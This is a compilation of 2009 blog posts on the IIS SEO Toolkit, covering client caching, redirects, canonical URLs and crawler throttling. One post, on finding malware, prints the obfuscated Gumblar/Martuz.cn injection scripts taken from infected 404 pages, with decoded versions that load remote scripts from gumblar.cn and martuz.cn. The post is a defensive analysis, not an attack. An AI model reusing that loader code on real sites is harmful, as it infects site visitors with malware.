June, 2009


    Are you caching your images and scripts? IIS SEO can tell you


One easy way to enhance the experience of users visiting your Web site is to improve the perceived performance of navigating the site by reducing the number of HTTP requests required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, combining images into a single larger image, etc., but by far the simplest one of all is making sure that you cache as much as you can on the client. This will not only improve rendering time but will also reduce the load on your server and your bandwidth consumption.

Unfortunately, the different types of caches and the different ways of setting them up can be quite confusing and esoteric. So my recommendation is to pick one approach and use it all the time, and that approach is using the HTTP 1.1 Cache-Control header.
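
For reference, a response that lets the client cache an image for seven days would carry a header along these lines (a simplified, hypothetical response; 604800 is the number of seconds in 7 days):

HTTP/1.1 200 OK
Content-Type: image/gif
Cache-Control: max-age=604800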

So first of all, how do I know if my application is well behaved and sending the right headers so that browsers can cache its content? You can use a network monitor or tools like Fiddler or WFetch to look at all the headers and figure out if they are being sent correctly. However, you will soon realize that this process won't scale for a site with hundreds, if not thousands, of scripts, styles and images.

Enter Site Analysis - IIS Search Engine Optimization Toolkit

To figure out if your images are sending the right headers you can follow these steps:

1. Install the IIS Search Engine Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
2. Launch InetMgr.exe (IIS Manager) and crawl your Web site. For more details on how to do that, refer to the article "Using Site Analysis to crawl a web site".
3. Once you are in the Site Analysis dashboard view, start a new query by using the menu "Query->New Query" and add the following criteria:
  1. Is External - Equals - False -> To include only the files that come from your Web site.
  2. Status Code - Equals - OK -> To include only successful requests.
  3. Content Type Normalized - Begins With - image/ -> To include only images.
  4. Headers - Not Contains - Cache-Control: -> To include only the ones that do not have the Cache-Control header specified.
  5. Headers - Not Contains - Expires: -> To include only the ones that do not have the Expires header.
  6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

Alternatively, you can just save the following query as "ImagesNotCached.xml" and open it using the menu "Query->Open Query". This makes it easy to run the same query against different Web sites or to keep checking the results as you make changes:

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="IsExternal" operator="Equals" value="False" />
    <expression field="StatusCode" operator="Equals" value="OK" />
    <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    <expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <expression field="Headers" operator="NotContains" value="Expires:" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="ContentTypeNormalized" />
    <field name="StatusCode" />
  </displayFields>
</query>

    How do I fix it?

In IIS 7 this is trivial to fix: you can just drop a web.config file in the same directory as your images, scripts and CSS styles, specifying the caching behavior for them. The following web.config sends the Cache-Control header so that the browser caches the responses for up to 7 days.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <staticContent>
      <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
    </staticContent>
  </system.webServer>
</configuration>

You can also do this through the UI (IIS Manager) by going to the "HTTP Response Headers" feature -> "Set Common Headers...", or through any of our APIs using managed code, JavaScript or your favorite language:

    http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

Furthermore, using the same query above in the Query Builder you can group by directory and find the directories where it is really worth adding this. It is just a matter of clicking the "Group by" button and adding URL-Directory to the Group by clauses. Not surprisingly, in my case it flags the App_Themes directory where I store 8 images.

[Image: query results grouped by URL directory]

    Finally, what about 304's?

One thing to note is that even if you do not do anything, most modern browsers will use conditional requests to reduce latency when they have a copy in their cache. As an example, imagine the browser needs to display logo.gif as part of rendering test.htm and that image is available in its cache; the browser will issue a request like this:

    GET /logo.gif HTTP/1.1
    Accept: */*
    Referer: http://carlosag-client/test.htm
    Accept-Language: en-us
    User-Agent: (whatever-browser-you-are-using)
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
    If-None-Match: "01c13f951cac81:0"
    Host: carlosagdev:8080
    Connection: Keep-Alive

Note the use of the If-Modified-Since header, which tells the server to only send the actual data if it has changed after that time. In this case it hasn't, so the server responds with a status code 304 (Not Modified):

    HTTP/1.1 304 Not Modified
    Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
    Accept-Ranges: bytes
    ETag: "01c13f951cac81:0"
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
    Date: Sun, 07 Jun 2009 06:33:51 GMT

Even though this helps, it still requires a whole roundtrip to the server. Even with a short response, that roundtrip can have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs in order to display the page correctly, or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).
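
For example, including the dimensions in the markup lets the browser reserve the space without waiting for the image to download (the file name and sizes here are just illustrative):

<img src="logo.gif" width="120" height="60" alt="Company logo" />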

    Summary

To summarize, with the IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, letting you find details that would otherwise be tedious to track down. In this case I showed how easy it is to find all the images that are not specifying any caching headers, and you can do the same thing for scripts (Content Type Normalized - Equals - application/javascript) or styles (Content Type Normalized - Equals - text/css). This way you can improve rendering performance and reduce the overall bandwidth of your Web site.
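
As a sketch, here is the same query adjusted for CSS styles, following the query format shown above (the content type your server actually reports for styles or scripts may differ, so adjust the value accordingly):

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="IsExternal" operator="Equals" value="False" />
    <expression field="StatusCode" operator="Equals" value="OK" />
    <expression field="ContentTypeNormalized" operator="Equals" value="text/css" />
    <expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <expression field="Headers" operator="NotContains" value="Expires:" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="ContentTypeNormalized" />
    <field name="StatusCode" />
  </displayFields>
</query>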


    Finding malware in your Web Site using IIS SEO Toolkit


The other day a friend of mine who owns a Web site asked me to look at it to see if I could spot anything weird, since according to his Web hosting provider it was being flagged as malware infected by Google.

My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and looked for anything suspicious in them, but he was not able to find anything. My friend then went back to his hosting provider, mentioned that they had not been able to find anything problematic, and asked if it could be something in the server configuration, to which they replied sarcastically that it was probably ignorance on the part of his Web site designer.

    Enter IIS SEO Toolkit

So of course the first thing I decided to do was to crawl the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of the pages and resources on his Web site. Since malware usually hides either in executables or in scripts on the server, I started by looking at the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

[Image: Content Types Summary report]

I was surprised not to find a single executable and to see only two very simple JavaScript files, which did not look like malware in any way. Based on previous experience I knew that malware in HTML pages is usually hidden behind a funky-looking script that is encoded and typically uses the eval function to run the code. So I quickly ran a query for HTML pages whose contents contain the word eval and the word unescape (the full query is included at the end of this post). I know there are valid scripts that use those functions, since they exist for a reason, but it was a good way to start scoping the pages.

    Gumblar and Martuz.cn Malware on sight

[Image: query for HTML pages containing eval and unescape]

After running the query as shown above, I got a set of HTML files, all of which returned a status code 404 (Not Found). Double-clicking any of them and looking at the HTML markup made it immediately obvious that they were infected with malware. Look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I have ever met a developer who writes code like that in a real Web application.

For those of you who, like me, do not particularly enjoy reading encoded JavaScript: what these two scripts do is just unescape the funky-looking string and then execute it. I have decoded the script that would get executed and show it below to illustrate how this malware works. Note how they special-case a couple of browsers, including Chrome, to then request a particular script that causes the real damage.

    var a = "ScriptEngine", 
       
    b = "Version()+", 
       
    j = "", 
       
    u = navigator.userAgent; 
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
       
    zrvzts = "A"; 
       
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
       
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
    }

    And:

    var a="ScriptEngine",
       
    b="Version()+",
       
    j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
       
    zrvzts="A";
       
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
    }

Notice how both of them end up writing a script tag that loads the actual malware script hosted at gumblar.cn and martuz.cn.

    Final data

Now, this clearly means they are infected with malware, and it also seems that the problem is not in the Web application: the infection is in the error pages that the server serves when an error happens. The next step, so I could guide them with more specifics, was to determine the Web server they were using. That is as easy as inspecting the headers in the IIS SEO Toolkit, which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

With the big disclaimer that I know nothing about Apache, I then pointed them to their .htaccess file and the httpd.conf file, looking for the ErrorDocument directive; that would show them which files were infected and whether it was a problem in their application or in the server.
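
For reference, a custom error page in Apache is typically wired up with an ErrorDocument directive along these lines (the path shown here is only an illustration, not taken from their server):

ErrorDocument 404 /errors/404.html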

    Case Closed

It turns out that after they went back to their hoster with all this evidence, the hoster finally realized that the server was infected and was able to clean up the malware. The IIS SEO Toolkit helped me quickly identify this because it sees the Web site with the same eyes as a search engine would, following every link and letting me run simple queries to find information about it. In future versions of the IIS SEO Toolkit you can expect to be able to find these kinds of things in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and load with "Open Query" to see if you are infected with this malware.

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <expression field="FileContents" operator="Contains" value="unescape" />
    <expression field="FileContents" operator="Contains" value="eval" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="StatusCode" />
    <field name="Title" />
    <field name="Description" />
  </displayFields>
</query>

    Announcing: IIS Search Engine Optimization Toolkit Beta 1


    Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

The features included in this Beta release are:

• Site Analysis. This feature includes a crawler that examines your Web site's contents, discovering links, downloading the content and applying a set of validation rules aimed at helping you easily troubleshoot common problems such as broken links and duplicate content, along with keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
• Robots Exclusion Editor. This includes a powerful editor for authoring Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allows you to easily add Allow and Disallow entries without having to edit a plain text file, making the process less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and immediately see the results of applying your robots files.
• Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both the physical and the logical (Site Analysis crawl report) view of your site.

Check out ScottGu's great blog post about the IIS SEO Toolkit, or this simple IIS SEO video showing some of its capabilities.

    Run it in your Development, Staging, or Production Environments

One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course they would never be usable for intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments, giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish, and you will not need to wait for those tools or for search engines to crawl your site to finally discover you broke things.

For developers this means that they can now easily look at the potential impact of removing or renaming a file, easily check which files refer to a given page, and see which files can be removed because they are only referenced by that page.

    Run it against any Web application built on any framework running in any server

One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running on any platform, whether it is ASP.NET, PHP or plain HTML files, running on your local IIS or on any other remote server.

Bottom line: try it against your Web site, look at the different features, and give us feedback for additional reports, options, violations, content to parse, etc. Post any comments or questions in the IIS Search Engine Optimization Forum.

    The IIS SEO Toolkit documentation can be found at http://learn.iis.net/page.aspx/639/using-iis-search-engine-optimization-toolkit/, but remember this is only Beta 1 so we will be adding more features and content.

[Image: IIS Search Engine Optimization Toolkit]


    Redirects, 301, 302 and IIS SEO Toolkit


In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily. Redirects are an important tool for Web sites and, used in the right context, they are actually a required tool. But first, a bit of background.

    What is a Redirect?

A redirect, in simple terms, is a way for the server to indicate to a client (typically a browser) that a resource has moved, and it does this by using an HTTP status code and an HTTP Location header. There are different types of redirects, but the most common ones are:

    • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header
    • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

Below is an example of the response sent from the server when requesting http://www.microsoft.com/SQL/:

    HTTP/1.1 302 Found
    Connection: Keep-Alive
    Content-Length: 161
    Content-Type: text/html; charset=utf-8
    Date: Wed, 10 Jun 2009 17:04:09 GMT
    Location: /sqlserver/2008/en/us/default.aspx
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
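
For comparison, a permanent redirect looks very similar, just with a different status code (the target URL here is only illustrative):

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=utf-8
Location: /new-location/default.aspx
Server: Microsoft-IIS/7.0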

     

    So what do redirects mean for SEO?

One of the most important factors in SEO is the concept called organic linking; in simple words, it means that your page gets extra points for every link that external Web sites have pointing to it. So now imagine the search engine bot is crawling an external Web site and finds a link pointing to your page (example.com/some-page), and when it tries to visit your page it runs into a redirect to another location (say example.com/somepage). Now the search engine has to decide whether it should add the original "some-page" to its index, whether it should "add the extra points" to the new location or to the original location, or whether it should just ignore it entirely. Well, the answer is not that simple, but a simplification of it could be:

• If you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently, so all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), that it should add all the "extra points" to it, and that any further references to the original location should now be treated as if they pointed to the new one.
• If you return a 302 (Temporary Redirect) the answer can depend on the search engine, but it is likely to index the original location and ignore the new location entirely (unless it is directly linked in other places), since the redirect is only temporary and the server could at any given point stop redirecting and start serving the content from the original location. This of course makes it very ambiguous how to deal with the "extra points", which will likely be added to the original location and not the new destination.

     

    Enter IIS SEO Toolkit

The IIS Search Engine Optimization Toolkit has a couple of rules that look for different patterns related to redirects. The Beta version includes the following:

1. The redirection did not include a location header. Believe it or not, there are a couple of applications out there that do not generate a Location header, which completely breaks the model of redirection. So if your application is one of them, it will let you know.
2. The redirection response results in another redirection. In this case it detected that your page (A) links to another page (B) which caused a redirection to another page (C), which resulted in yet another redirection to another page (D). It is trying to let you know that the number of redirects could significantly impact the SEO "bonus points", since the organic linking could be broken by all this jumping around, and that you should consider linking directly from (A) to (D), or whatever page is supposed to be the final destination.
3. The page contains unnecessary redirects. In this case it detected that your page (A) links to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as tracking page impressions, login pages, etc., but in many cases you do not need them. Since we detect that you own all three pages, we are suggesting that you look and see if it wouldn't be better to just change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
4. The page uses a refresh definition instead of using redirection. Finally, related to redirection, IIS SEO will flag when it detects that the refresh meta-tag is being used as a means of causing a redirection. This practice is not recommended since the tag does not include any semantics for search engines on how to process the content, and in many cases it is actually considered a tactic to confuse search engines, but I won't go there.

So what does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).

[Image: Violations Summary showing redirect-related violations]

Notice that when you double-click a violation it will show you the details as well as give you direct access to the related URLs, so that you can look at the content and all the relevant information about them to make a decision. From that menu you can also look at which other pages link to the pages involved, as well as launch them in the browser if needed.

[Image: violation details with links to the related URLs]

Similarly, for all the other violations it tries to explain the reason each one is being flagged, as well as the recommended actions to follow for each of them.

The IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way: just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 KB. (Note that I have seen Web sites generate a large amount of useless content in redirect traffic, speaking of wasted bandwidth.) You can double-click any of those rows and it will show you the details of the URLs that returned that status code, and from there you can see who links to them, etc.

[Image: Status Code Summary showing temporary and permanent redirects]

    So what should I do?

1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
2. Try to minimize redirections. If possible, with the knowledge gained in step 1, look for places where you can update your content to reduce the number of redirects.
3. Use the right redirect. Understand the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary?). Whenever possible prefer permanent redirects (301).
4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules, using both regular expressions and wildcards, that live along with your application (no administrative privileges required) and let you set the right redirection status code; a sketch of such a rule is shown after this list. A must for SEO. More on this in a future blog.
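
As a rough sketch only (the rule name is made up, and the URLs reuse the some-page/somepage example from earlier in this post), a permanent redirect configured with URL Rewrite in web.config could look something like this:

<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <!-- Permanently redirect the old URL to its new location -->
        <rule name="Redirect old page" stopProcessing="true">
          <match url="^some-page$" />
          <action type="Redirect" url="/somepage" redirectType="Permanent" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>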

    Summary

So going back to the original question: "are redirects bad for Search Engine Optimization?" Not necessarily. They are an important tool used by Web applications for many reasons, such as:

• Canonicalization. To ensure that users access your site either with www. or without www., use permanent redirects.
• Page impressions and analytics. Use temporary redirects to ensure that the original link is preserved and counters work as expected.
• Content reorganization. Whether you are changing your host name due to a brand change or just renaming a page, make sure to use permanent redirects to keep your page rankings.
    • etc

Just make sure you don't abuse them with redirects to redirects, unnecessary redirects or infinite loops, and use the right semantics.


    Canonical Formats and Query Strings - IIS SEO Toolkit


Today somebody was running the IIS SEO Toolkit and the Site Analysis feature flagged a lot of violations of "The page contains multiple canonical formats." The reason, apparently, is that he uses query string parameters to pass contextual or other information between pages. This of course raised the question: does that mean query strings are, in general, bad news SEO-wise?

    Well, the answer is not necessarily.

I will start by clarifying that this violation in Site Analysis means that our algorithm detected that two URLs look like the same content; note that we make no assumptions based on the URL itself (including query string parameters). This kind of situation is bad for a couple of reasons:

1. Based on the fact that they look like the same page, search engines will probably choose one of them, index it as the real content and discard the other one. The problem is that you are leaving this decision to the search engines, which means some might choose the wrong version and end up using the one with query string parameters instead of the clean one (not likely, though). Or, even worse, they might end up indexing both of them as if they were different pages.
2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different query string parameters and some of them not. What this means is that the organic linking will not give you the benefits that it otherwise would. Remember, search engines give you "extra" points when somebody external references your page, but now you will be splitting the earnings between "two pages" instead of a single canonical form.

Query strings by themselves do not pose a terrible threat to SEO; most modern search engines deal with query strings just fine. However, it is the organic linking and the potential abuse of query strings that could give you headaches.

Remember, search engines should make no assumptions when a single "page" serves tons of content through a single absolute path and variations of the query string. This is typical in many cases, such as when using index.php, where pretty much every page on the site is served by the same resource using variations of the query string or path information.

     

    So what should I do?

Well, there are several things you could do, but probably one of the easiest is to just tell search engines (more specifically, crawlers or bots) not to index pages with the query string variations that are really meant only for the application to pass state, not to specify different content. This can be done using the Robots Exclusion Protocol, using wildcard matching to tell them not to follow any URLs that contain a '?'. Note that you should make sure you are not blocking URLs that actually are supposed to be indexed. For this you can run the Site Analysis feature again, and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

    User-agent: *
    Disallow: /*?

     

In summary, try to keep the canonical formats yourself; don't leave any guesses to the search engines, because some of them might get it wrong. There is a new way of specifying the canonical form in your markup, but it is very recent (as in 2009) and some search engines do not support it (I believe the top three do, though): the new rel="canonical":

    <link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

In the Beta 2 version of the IIS SEO Toolkit we will support this tag and have better detection of these canonical issues. So stay tuned.

Another way to solve this is to use URL Rewrite, so that you can easily redirect or rewrite your URLs to get rid of the query strings and use more SEO-friendly URLs.
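
As a rough sketch only (the URL pattern, parameter name and target path are hypothetical, and whether redirecting is appropriate depends on your application), a URL Rewrite rule in web.config that sends a query string URL to a cleaner form could look like this:

<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <!-- Redirect index.php?id=123 to /article/123 as a permanent redirect -->
        <rule name="Redirect to clean URL" stopProcessing="true">
          <match url="^index\.php$" />
          <conditions>
            <add input="{QUERY_STRING}" pattern="^id=([0-9]+)$" />
          </conditions>
          <action type="Redirect" url="article/{C:1}" redirectType="Permanent" appendQueryString="false" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>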


    IIS SEO Tip - Do not stress your server, limit the number of concurrent requests


The other day somebody asked me if there was a way to limit the amount of work that Site Analysis in the IIS SEO Toolkit causes on the server. This is interesting for a couple of reasons:

• You might want to reduce the load that Site Analysis causes on your server at any given time.
• You might have a denial-of-service detection system, such as our Dynamic IP Restrictions IIS module, that will start failing requests based on the number of requests in a certain amount of time.
• Or, like me, you might have to go through a proxy that has a configured limit on the number of requests per minute you are allowed to issue.

In Beta 1 we do not support the Crawl-delay directive of the Robots Exclusion protocol; in future versions we will look at adding support for this setting. The good news is that Beta 1 does have a configurable setting that can help you achieve these goals, called Maximum Number of Concurrent Requests.
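
For reference, the Crawl-delay directive is specified in a robots.txt file like this (the value of 10 is just an example; crawlers that honor the directive typically interpret it as the number of seconds to wait between requests):

User-agent: *
Crawl-delay: 10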

    To set it:

    1. Go to the Site Analysis Reports page
2. Select the option "Edit Feature Settings..." as shown in the next image.
  [Image: the "Edit Feature Settings..." menu option]
    3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
  [Image: the "Edit Feature Settings" dialog showing Maximum Number of Concurrent Requests]